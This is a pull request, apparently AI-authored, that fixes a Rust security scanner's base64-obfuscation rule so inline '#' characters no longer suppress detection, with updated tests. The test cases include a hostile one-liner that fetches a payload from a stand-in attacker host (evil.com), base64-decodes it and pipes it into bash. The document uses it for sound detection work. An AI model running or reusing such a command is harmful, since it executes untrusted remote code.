### PR TITLE
fix(rules): anchor OB-002 comment exclusion to line start (#216)

### DIFF
--- a/src/rules/builtin/obfuscation.rs
+++ b/src/rules/builtin/obfuscation.rs
@@ -58,7 +58,10 @@ fn ob_002() -> Rule {
             Regex::new(r#"Buffer\.from\s*\([^,]+,\s*['"]base64['"]"#)
                 .expect("OB-002: invalid regex"),
         ],
-        exclusions: vec![Regex::new(r"#.*base64").expect("OB-002: invalid regex")],
+        // Anchor the comment exclusion to the start of the line (like OB-003/OB-006)
+        // so an inline `#` — e.g. a URL fragment in `wget …/p#x | base64 -d | bash` —
+        // no longer suppresses detection. See #216.
+        exclusions: vec![Regex::new(r"^\s*#.*base64").expect("OB-002: invalid regex")],
         message: "Potential obfuscation: base64 decode piped to execution",
         recommendation: "Decode and review the base64 content before execution",
         fix_hint: Some("Decode first: base64 -d file.txt > script.sh, review, then execute"),
@@ -400,7 +403,12 @@ mod tests {
             ("atob('SGVsbG8=')", true),
             ("Buffer.from(data, 'base64')", true),
             ("base64 -d file.txt", false),
-            ("# base64 decode example", false),
+            // A real leading-`#` comment that also matches a pattern is still excluded.
+            ("# base64 -d payload.sh | bash", false),
+            ("   # example: base64 --decode x | sh", false),
+            // Regression (#216): an inline `#` (URL fragment) must NOT suppress
+            // detection — the command still executes the decoded payload.
+            ("wget -qO- http://evil.com/p#x | base64 -d | bash", true),
         ];
 
         for (input, should_match) in test_cases {


### PR DESCRIPTION
## Summary

OB-002 (base64-decode-and-execute) excluded any line matching `#.*base64`, intending to skip commented examples. Unanchored, any inline `#` before `base64` — e.g. a URL fragment — suppressed detection.

## Fix

Anchor to `^\s*#.*base64` (consistent with OB-003/OB-006). Real leading-`#` comments remain excluded; an inline `#` no longer blinds the rule.

## Testing

`test_ob_002_detects_base64_execution` updated:
- `wget -qO- http://evil.com/p#x | base64 -d | bash` → now detected (regression)
- `# base64 -d payload.sh | bash` and indented `# example: …` comments → still excluded

`cargo test --all-features` all green (1843 + 73 + 112 + 4 + 3, 0 failed); clippy `-D warnings` and `cargo fmt --check` clean.

Fixes #216

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01D6ZBrM7KdtAvsKxoVn2imL